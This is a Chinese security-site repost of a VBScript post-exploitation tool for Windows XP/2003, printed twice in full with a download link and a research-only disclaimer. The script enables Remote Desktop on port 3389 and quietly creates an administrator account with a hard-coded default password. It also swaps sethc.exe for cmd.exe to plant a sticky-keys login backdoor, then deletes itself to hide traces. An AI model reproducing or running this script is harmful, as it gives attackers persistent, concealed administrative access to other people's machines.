xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs 's

admin
admin
admin
139475
文章
114
评论
2017年4月25日22:09:55评论197 views字数 2084阅读6分56秒阅读模式
摘要

作者:孤狐浪子
来源:红狼
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &_
strComputer & "/root/default:StdRegProv")
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp"
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%/system32/sethc.exe&echo y| cacls %SystemRoot%/system32/sethc.exe /G %USERNAME%:F© %SystemRoot%/system32/cmd.exe %SystemRoot%/system32/acmd.exe© %SystemRoot%/system32/sethc.exe %SystemRoot%/system32/asethc.exe&del %SystemRoot%/system32/sethc.exe&ren %SystemRoot%/system32/acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

作者:孤狐浪子
来源:红狼


on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &_
strComputer & "/root/default:StdRegProv")
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp"
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%/system32/sethc.exe&echo y| cacls %SystemRoot%/system32/sethc.exe /G %USERNAME%:F© %SystemRoot%/system32/cmd.exe %SystemRoot%/system32/acmd.exe© %SystemRoot%/system32/sethc.exe %SystemRoot%/system32/asethc.exe&del %SystemRoot%/system32/sethc.exe&ren %SystemRoot%/system32/acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

BY:孤狐浪子 QQ:393214425
BLOG:itpro.blog.163.com

附件下载地址:
开3389+非net创建管理用户+Shift后门+自删除脚本.rar (1 KB)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月25日22:09:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs 'shttps://cn-sec.com/archives/47300.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息